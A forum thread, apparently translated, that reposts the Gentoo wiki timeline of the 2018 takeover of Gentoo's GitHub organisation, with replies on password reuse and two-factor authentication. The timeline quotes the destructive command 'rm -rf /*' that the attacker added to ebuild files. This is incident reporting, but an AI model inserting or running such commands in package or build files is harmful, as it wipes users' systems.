Gentoo Linux GitHub account hacked on June 28; rm -rf added to all ebuild files

2018-07-06 09:58:41 +08:00
 onion83
2018-06-28
20:05 2nd to last known legitimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
      Auto-pushed by mirror bot.
      Commit ID 38281f4252f89e3ef9cbae54dfc1ad553d296979
20:08 Last known legitimate commit to gentoo/musl. Matches git.gentoo.org/proj/musl.git.
      Commit ID 60461ca1385809bacf6a114a7f1ecfe22f6da47f
20:19 Attacker tries a bad password on the account.
20:19 Attacker successfully gains administrative access
20:25 Attacker invites a dummy account to the org
20:25 Attacker creates a dummy account with administrative access.
20:25 Last known legitimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
      Auto-pushed by mirror bot.
      Commit ID 73b724093b9c2a8756b8c35d3e09793342fa9ca9
      Does NOT appear in the GitHub audit log for the org.
20:25 Attacker starts removing valid users
20:26 Earliest email timestamp of someone being removed from the organization.
20:29 First person notices that something is going on with the GitHub organization
20:30 Attacker invites a second malicious user.
20:32 Attacker adds second malicious user with admin privileges.
20:34 Malicious commit to gentoo/gentoo, 73b72409->fdd8da2e
      adds readme.me file with racist text.
20:36 First report to Infra that something is going on with the GitHub organization.
20:38 Malicious commit to gentoo/gentoo, fdd8da2e->49464b73.
      adds rm -rf /*& at the top of skel.ebuild
20:39 Attacker changes billing email, the first time.
20:45 Malicious commit 49464b73 is first noticed
20:48 Attacker changes billing email, the second time
20:49 First abuse report to GitHub support
20:50 Malicious commit to gentoo/gentoo, 49464b73->afcdc03b.
      adds rm -rf /* at the top of every ebuild.
20:51 Infra's informal contact to GitHub via multiple personal channels
20:53 Second abuse report to GitHub
20:55 Malicious commit to gentoo/gentoo, afcdc03b->e6db0eb4, force-push.
      Squash of entire history as of afcdc03b (rm -rf /* in ebuilds)
……

Via: https://wiki.gentoo.org/wiki/Github/2018-06-28
7 replies
zhustec
2018-07-06 10:59:09 +08:00
How's the battle on Reach going?
Rasphino
2018-07-06 11:03:30 +08:00
Could the OP check today's date before posting?
fuxiaohei
2018-07-06 11:06:51 +08:00
It was stopped right when it happened.
onion83
2018-07-06 12:41:52 +08:00
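If you're not a Gentoo fan, please don't start flaming without reading the link first; the project only announced this incident as resolved last night.
What I want to share is a story, not a piece of news.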
zjp
2018-07-06 13:06:05 +08:00
The first reply set a bad example.
But I still don't understand how they got hold of the GitHub account. Brute force? "tries a bad password"
xiaket
2018-07-06 13:08:26 +08:00
@zjp Apparently the admin's password was reused across sites.
greenskinmonster
2018-07-06 13:21:30 +08:00
Wasn't two-step verification enabled?
